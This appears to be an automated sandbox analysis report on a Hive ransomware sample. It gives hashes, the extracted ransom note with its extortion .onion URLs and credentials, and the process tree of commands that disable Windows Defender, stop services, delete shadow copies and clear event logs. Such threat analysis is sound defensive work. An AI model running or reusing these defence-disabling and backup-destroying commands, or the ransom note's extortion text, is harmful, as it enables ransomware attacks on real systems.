Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64 arch:x86 image:win7-20241010-en locale:en-us os:windows7-x64 system
  • submitted
    12/03/2025, 01:26

General

  • Target

    2025-03-12_074ce128e23528f00e98eac6ae9a6618_frostygoop_hive_sliver_snatch.exe

  • Size

    3.7MB

  • MD5

    074ce128e23528f00e98eac6ae9a6618

  • SHA1

    39b2c91abb87af6399a7befab2fc100a03631258

  • SHA256

    04371796ab1e77b188bf8f1007466552b2faf7176918f3e0b6ce499d3ba57411

  • SHA512

    1db6635586bd506d4ca98e6be8b759fcfb8f44b7b6c3a96abf62986e4be49b5a04e3003dc379c8ea28342b3837ba71a32fa598125b8af001faebed9d8a23d97e

  • SSDEEP

    24576:ajAj4d2Cc/8o+1WkGHIvl4Bw5vJULHsbDwPD9cAXVCEbEWBgvM7eTVVfR35e7xLP:ayxIZk9FO5e1lqd/E+e7CZti1D1f

Malware Config

Extracted

Path

C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\yxjL_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note
Your network has been breached and all data were encrypted.
Personal data, financial reports and important documents are ready to disclose.

To decrypt all the data and to prevent exfiltrated files to be disclosed at
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
you will need to purchase our decryption software.

Please contact our sales department at:
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Login: 1i7Cpkz1ZCc4
Password: rX7WMQu6mrF6DBtf4eM2

To get an access to .onion websites download and install Tor Browser at:
https://www.torproject.org/ (Tor Browser is not related to us)

Follow the guidelines below to avoid losing your data:
- Do not modify, rename or delete *.key.vsbnw files. Your data will be undecryptable.
- Do not modify or rename encrypted files. You will lose them.
- Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything.
- Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself.
- Do not reject to purchase. Exfiltrated files will be publicly disclosed.

URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Disables service(s) 3 TTPs
  • Hive

    A ransomware written in Golang first seen in June 2021.

  • Hive family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Clears Windows event logs 1 TTPs 3 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (1917) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (5590) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Modifies Security services 2 TTPs 6 IoCs

    Modifies the startup behavior of a security service.

  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-12_074ce128e23528f00e98eac6ae9a6618_frostygoop_hive_sliver_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-12_074ce128e23528f00e98eac6ae9a6618_frostygoop_hive_sliver_snatch.exe"
    1⤵
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1956
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "NetMsmqActivator" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2332
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "NetMsmqActivator" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2600
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "SamSs" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2620
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "SamSs" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3028
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "SDRSVC" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3020
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "SDRSVC" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2472
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "SstpSvc" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2588
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "SstpSvc" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2844
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "UI0Detect" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2252
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "UI0Detect" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2968
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "VSS" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2972
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "VSS" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2852
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "wbengine" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2848
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "wbengine" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2832
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "WebClient" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2288
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "WebClient" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2992
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "NetMsmqActivator" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2816
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "SamSs" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2260
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "SDRSVC" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2720
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "SstpSvc" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2864
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "UI0Detect" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:1904
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "VSS" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2008
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "wbengine" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:1612
    • C:\Windows\SysWOW64\sc.exe
      sc.exe config "WebClient" start= disabled
      2⤵
      • Launches sc.exe
      • System Location Discovery: System Language Discovery
      PID:2084
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      • Modifies Security services
      PID:1948
    • C:\Windows\SysWOW64\reg.exe
      reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1940
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender DisableAntiSpyware settings
      • System Location Discovery: System Language Discovery
      PID:1916
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1604
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1740
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      PID:2036
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • System Location Discovery: System Language Discovery
      PID:2756
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      PID:1244
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • System Location Discovery: System Language Discovery
      PID:1716
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • System Location Discovery: System Language Discovery
      PID:1476
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1896
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      2⤵
      PID:2684
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:316
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1692
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2788
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2876
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3044
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2656
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2176
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1224
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2452
    • C:\Windows\SysWOW64\reg.exe
      reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:716
    • C:\Windows\SysWOW64\reg.exe
      reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2676
    • C:\Windows\SysWOW64\reg.exe
      reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2248
    • C:\Windows\SysWOW64\reg.exe
      reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1616
    • C:\Windows\SysWOW64\reg.exe
      reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1420
    • C:\Windows\SysWOW64\reg.exe
      reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:296
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      • Modifies Security services
      • System Location Discovery: System Language Discovery
      PID:1012
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      • Modifies Security services
      • System Location Discovery: System Language Discovery
      PID:2368
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      • Modifies Security services
      • System Location Discovery: System Language Discovery
      PID:868
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      • Modifies Security services
      • System Location Discovery: System Language Discovery
      PID:1468
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      • Modifies security service
      • System Location Discovery: System Language Discovery
      PID:932
    • C:\Windows\SysWOW64\reg.exe
      reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
      2⤵
      • Modifies Security services
      PID:1572
    • C:\Windows\SysWOW64\vssadmin.exe
      vssadmin.exe delete shadows /all /quiet
      2⤵
      • System Location Discovery: System Language Discovery
      • Interacts with shadow copies
      PID:2024
    • C:\Windows\SysWOW64\wevtutil.exe
      wevtutil.exe cl system
      2⤵
      • Clears Windows event logs
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:1400
    • C:\Windows\SysWOW64\wevtutil.exe
      wevtutil.exe cl security
      2⤵
      • Clears Windows event logs
      • Suspicious use of AdjustPrivilegeToken
      PID:2520
    • C:\Windows\SysWOW64\wevtutil.exe
      wevtutil.exe cl application
      2⤵
      • Clears Windows event logs
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:916
    • C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic.exe SHADOWCOPY /nointeractive
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:1720
    • C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic.exe shadowcopy delete
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:612
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2336
      • C:\Program Files\Windows Defender\MpCmdRun.exe
        "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        3⤵
        • Deletes Windows Defender Definitions
        PID:2548
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
      2⤵
      PID:3060
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell Set-MpPreference -DisableIOAVProtection $true
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:2464
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2852
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell Set-MpPreference -DisableRealtimeMonitoring $true
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2832
    • C:\Windows\SysWOW64\notepad.exe
      notepad.exe C:\yxjL_HOW_TO_DECRYPT.txt
      2⤵
      • System Location Discovery: System Language Discovery
      • Opens file in notepad (likely ransom note)
      PID:3004
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\2025-03-12_074ce128e23528f00e98eac6ae9a6618_frostygoop_hive_sliver_snatch.exe"
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Internet Connection Discovery
      PID:2860
      • C:\Windows\SysWOW64\PING.EXE
        ping.exe -n 5 127.0.0.1
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:768

Network

MITRE ATT&CK Enterprise v15

Downloads
